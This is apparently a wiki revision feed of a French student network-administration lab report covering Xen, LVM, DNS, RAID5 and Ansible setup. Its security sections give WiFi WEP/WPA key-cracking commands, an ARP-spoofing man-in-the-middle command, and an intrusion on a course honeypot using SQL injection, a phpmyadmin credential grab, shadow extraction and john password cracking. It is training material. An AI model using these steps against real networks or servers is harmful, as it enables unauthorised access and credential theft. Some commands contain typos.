Pour l'agent de courriel nous utilsons Bsd-mailx. que l'on installe et configure ainsi :&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crackwpagrp11.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
=5.4 Attaque &amp;quot;homme au milieu&amp;quot;=&lt;br /&gt;
&lt;br /&gt;
Commande afin de voir les paquets entre la machine et le routeur&lt;br /&gt;
 arpspoof -i eth0 -t 172.26.145.57 172.26.145.254 &lt;br /&gt;
&lt;br /&gt;
Ensuite, on peut visualiser les paquets reçu avec wireshark.&lt;br /&gt;
&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=6.1 Installation Raid5=&lt;br /&gt;
&lt;br /&gt;
Création des partitions sur capbreton&lt;br /&gt;
 lvcreate -LG -n stropharia-part1 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part2 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part3 virtual&lt;br /&gt;
&lt;br /&gt;
Modification du fichier stropharia.cfg&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part1,xvda5,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part2,xvda6,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part3,xvda7,w'&lt;br /&gt;
&lt;br /&gt;
On recrée notre VM&lt;br /&gt;
 xl destroy stropharia&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
Création des volumes et formatage&lt;br /&gt;
 mdadm --create --verbose /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
 mkds -t ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Mount des partitions&lt;br /&gt;
 mount /dev/md0 /mnt&lt;br /&gt;
&lt;br /&gt;
Nous pouvons donc maintenant perdre un disque en gardant les données de la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
=7.1 Architecture de la ferme= &lt;br /&gt;
&lt;br /&gt;
Création d'un bridge dans les paramètres de la machine virtuelle stropharia.&lt;br /&gt;
&lt;br /&gt;
Ajout d'une interface dans les 2 VM en modifiant /etc/network/interfaces.&lt;br /&gt;
&lt;br /&gt;
Ajout de la mascarade&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.42.25 &lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.42.25 &lt;br /&gt;
 iptables -t nat -A POSTROUTING -j SNAT -s 192.168.42.25  --to 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Création de la clef publique et commande pour la transmettre aux VM.&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/id_rsa.pub | ssh username@remote_host &amp;quot;mkdir -p ~/.ssh &amp;amp;&amp;amp; cat &amp;gt;&amp;gt; ~/.ssh/authorized_keys&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Rôle motd (adriagalin.motd)&lt;br /&gt;
 ansible-galaxy install adriagalin.motd&lt;br /&gt;
&lt;br /&gt;
=7.2 Installation de docker= &lt;br /&gt;
Installation du rôle geerlingguy.docker&lt;br /&gt;
 ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Pour adapter le rôle à debian buster, il faut modifier les variables suivantes dans le playbook:&lt;br /&gt;
 docker_apt_gpg_key: https://download.docker.com/linux/debian/gpg&lt;br /&gt;
 docker_apt_repository: deb [arch=amd64] https://download.docker.com/linux/debian buster stable&lt;br /&gt;
&lt;br /&gt;
On peut donc lancer l'installation (uniquement sur stropharia)&lt;br /&gt;
 ansible-playbook dockerplaybook&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55158</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55158"/>
				<updated>2020-12-21T23:57:33Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* 4.3  Sécurisation de site web par certificat */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=****** --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
Les disques de capbreton ont été initialisé pour l'utilisation avec LVM :&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
&lt;br /&gt;
Ces disques sont ensuite rassemblés dans le volume groupe storage :&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
On obtient bien un groupe de 5.46 Tb :&lt;br /&gt;
 root@capbreton:~# vgdisplay storage&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  59&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                38&lt;br /&gt;
  Open LV               37&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       69632 / 272.00 GiB&lt;br /&gt;
  Free  PE / Size       1360894 / 5.19 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
On crée alors deux volumes logiques de 10 Go qui nous servirons de /var et /home :&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n stropharia-home storage&lt;br /&gt;
 lvcreate -L10G -n stropharia-var storage&lt;br /&gt;
&lt;br /&gt;
Voici le résultat :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# lvdisplay | grep &amp;quot;stropharia&amp;quot; -A 15&lt;br /&gt;
  LV Path                /dev/storage/stropharia-home&lt;br /&gt;
  LV Name                stropharia-home&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                ofMU3m-QoN1-pZcA-32Dp-HJBN-ZNAn-O3awlc&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:11 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:18&lt;br /&gt;
   &lt;br /&gt;
  --- Logical volume ---&lt;br /&gt;
  LV Path                /dev/storage/stropharia-var&lt;br /&gt;
  LV Name                stropharia-var&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                8YAGLs-wD0c-6pSF-VEmC-wUfT-e9SI-8X9nFn&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:15 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:19&lt;br /&gt;
&lt;br /&gt;
==Mise en place des partitions==&lt;br /&gt;
On formate nos partitions au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-home&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-var&lt;br /&gt;
&lt;br /&gt;
On note ces modifications dans /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
 disk       = [&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
            ]&lt;br /&gt;
&lt;br /&gt;
On lance maintenant la VM et l'on s'y connecte :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xl console stropharia&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après avoir monté et peuplé les partitions, on ajoute dans /etc/fstab&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
pour que le montage des partitions soit fait automatiquement à chaque démarrage.&lt;br /&gt;
&lt;br /&gt;
=4.1 Serveur SSH=&lt;br /&gt;
&lt;br /&gt;
Afin de rendre accessible notre VM par SSH, nous décommentons la ligne&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
du fichier sshd-config. On restart ensuite le service pour prendre en comte la modification avec la commande&lt;br /&gt;
 sytemctl restart sshd&lt;br /&gt;
On test la connection :&lt;br /&gt;
 $ ssh root@ns1.stropharia.site&lt;br /&gt;
 root@ns1.stropharia.site's password:&lt;br /&gt;
La connection ssh fonctionne donc.&lt;br /&gt;
Update : On peut aussi se connecter en avec&lt;br /&gt;
 ssh root@www.stropharia.site&lt;br /&gt;
&lt;br /&gt;
=4.2 Serveur DNS=&lt;br /&gt;
Nous configurons d'abord nos paramètres DNS dans gandi avant de confgurer la VM. &lt;br /&gt;
&lt;br /&gt;
Dans Glue Records nous ajoutons le namespace et son IP : ns1.stropharia.site / 193.48.57.178&lt;br /&gt;
Dans Name Server nous ajoutons ce DNS et le secondaire :&lt;br /&gt;
ns1.stropharia.site | ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser l'implémentation open-source de DNS bind pour créer une association entre notre nom de domaine et l'IP de notre VM. &lt;br /&gt;
&lt;br /&gt;
On commence par créer le fichier /etc/bind/db.stropharia.site&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-ksk.key&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-zsk.key&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.stropharia.site. root.stropharia.site. (&lt;br /&gt;
                              13         ; Serial&lt;br /&gt;
                            3600         ; Refresh [1h]&lt;br /&gt;
                             600         ; Retry [10mn]&lt;br /&gt;
                           86400         ; Expire [1d]&lt;br /&gt;
                             600 )       ; Negative Cache TTL [1h]&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.stropharia.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      42 ns1&lt;br /&gt;
 ns1     IN      A       193.48.57.178&lt;br /&gt;
 www     IN      A       193.48.57.178&lt;br /&gt;
 ns1     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
 www     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
&lt;br /&gt;
Les parties mail et ipv6 font partie de la suite du TP, mais on peut voir les différents TTL pour le SOA (Start of Authority) ainsi que notre notre serveur de nom et l'adresse de l'hote.&lt;br /&gt;
&lt;br /&gt;
Afin d'avoir une trace personnelle, un record dans le fichier de zone à la forme suivante :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Format: !! host label!! ttl !! record class !! record type !! record data&lt;br /&gt;
|-&lt;br /&gt;
| Example:&lt;br /&gt;
| example.com&lt;br /&gt;
| 60&lt;br /&gt;
| IN&lt;br /&gt;
| A&lt;br /&gt;
| 104.255.228.125&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Et les différentes record types sont :&lt;br /&gt;
* A (Host address)&lt;br /&gt;
* AAAA (IPv6 host address)&lt;br /&gt;
* ALIAS (Auto resolved alias)&lt;br /&gt;
* CNAME (Canonical name for an alias)&lt;br /&gt;
* MX (Mail eXchange)&lt;br /&gt;
* NS (Name Server)&lt;br /&gt;
* PTR (Pointer)&lt;br /&gt;
* SOA (Start Of Authority)&lt;br /&gt;
* SRV (location of service)&lt;br /&gt;
* TXT (Descriptive text)&lt;br /&gt;
&lt;br /&gt;
On ajoute maintenant la zone dans le fichier /etc/bind/named.conf.local :&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;stropharia.site&amp;quot; IN {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.stropharia.site.signed&amp;quot;;&lt;br /&gt;
         allow-transfer {217.70.177.40;};&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
(On utilise le fichier signé pour sécuriser l'accès https, fait par la suite)&lt;br /&gt;
&lt;br /&gt;
On modifie également le fichier named.conf.options :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
         dnssec-enable yes;&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Afin d'autoriser le transfert des informations au DNS secondaire 217.70.177.40.&lt;br /&gt;
&lt;br /&gt;
On test alors la configuration :&lt;br /&gt;
 # host -t any stropharia.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases:&lt;br /&gt;
 stropharia.site mail is handled by 42 &lt;br /&gt;
 ns1.stropharia.site.&lt;br /&gt;
 stropharia.site name server ns1.stropharia.site.&lt;br /&gt;
 stropharia.site name server ns6.gandi.net.&lt;br /&gt;
 stropharia.site has SOA record ns1.stropharia.site. &lt;br /&gt;
 root.stropharia.site. 13 3600 600 86400 600&lt;br /&gt;
&lt;br /&gt;
On conclue que le DNS est fonctionne correctement.&lt;br /&gt;
&lt;br /&gt;
=4.3  Sécurisation de site web par certificat=&lt;br /&gt;
&lt;br /&gt;
Cette section décrit les étapes nécéssaire à la sécurisation par un accès https.&lt;br /&gt;
&lt;br /&gt;
Le résultat est le suivant : &lt;br /&gt;
[[Fichier:https_stropharia.png|400px]]&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crackwpagrp11.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
=5.4 Attaque &amp;quot;homme au milieu&amp;quot;=&lt;br /&gt;
&lt;br /&gt;
Commande afin de voir les paquets entre la machine et le routeur&lt;br /&gt;
 arpspoof -i eth0 -t 172.26.145.57 172.26.145.254 &lt;br /&gt;
&lt;br /&gt;
Ensuite, on peut visualiser les paquets reçu avec wireshark.&lt;br /&gt;
&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=6.1 Installation Raid5=&lt;br /&gt;
&lt;br /&gt;
Création des partitions sur capbreton&lt;br /&gt;
 lvcreate -LG -n stropharia-part1 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part2 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part3 virtual&lt;br /&gt;
&lt;br /&gt;
Modification du fichier stropharia.cfg&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part1,xvda5,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part2,xvda6,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part3,xvda7,w'&lt;br /&gt;
&lt;br /&gt;
On recrée notre VM&lt;br /&gt;
 xl destroy stropharia&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
Création des volumes et formatage&lt;br /&gt;
 mdadm --create --verbose /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
 mkds -t ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Mount des partitions&lt;br /&gt;
 mount /dev/md0 /mnt&lt;br /&gt;
&lt;br /&gt;
Nous pouvons donc maintenant perdre un disque en gardant les données de la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
=7.1 Architecture de la ferme= &lt;br /&gt;
&lt;br /&gt;
Création d'un bridge dans les paramètres de la machine virtuelle stropharia.&lt;br /&gt;
&lt;br /&gt;
Ajout d'une interface dans les 2 VM en modifiant /etc/network/interfaces.&lt;br /&gt;
&lt;br /&gt;
Ajout de la mascarade&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.42.25 &lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.42.25 &lt;br /&gt;
 iptables -t nat -A POSTROUTING -j SNAT -s 192.168.42.25  --to 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Création de la clef publique et commande pour la transmettre aux VM.&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/id_rsa.pub | ssh username@remote_host &amp;quot;mkdir -p ~/.ssh &amp;amp;&amp;amp; cat &amp;gt;&amp;gt; ~/.ssh/authorized_keys&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Rôle motd (adriagalin.motd)&lt;br /&gt;
 ansible-galaxy install adriagalin.motd&lt;br /&gt;
&lt;br /&gt;
=7.2 Installation de docker= &lt;br /&gt;
Installation du rôle geerlingguy.docker&lt;br /&gt;
 ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Pour adapter le rôle à debian buster, il faut modifier les variables suivantes dans le playbook:&lt;br /&gt;
 docker_apt_gpg_key: https://download.docker.com/linux/debian/gpg&lt;br /&gt;
 docker_apt_repository: deb [arch=amd64] https://download.docker.com/linux/debian buster stable&lt;br /&gt;
&lt;br /&gt;
On peut donc lancer l'installation (uniquement sur stropharia)&lt;br /&gt;
 ansible-playbook dockerplaybook&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Https_stropharia.png&amp;diff=55157</id>
		<title>Fichier:Https stropharia.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Https_stropharia.png&amp;diff=55157"/>
				<updated>2020-12-21T23:53:17Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55156</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55156"/>
				<updated>2020-12-21T23:40:15Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* 4.2 Serveur DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=****** --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
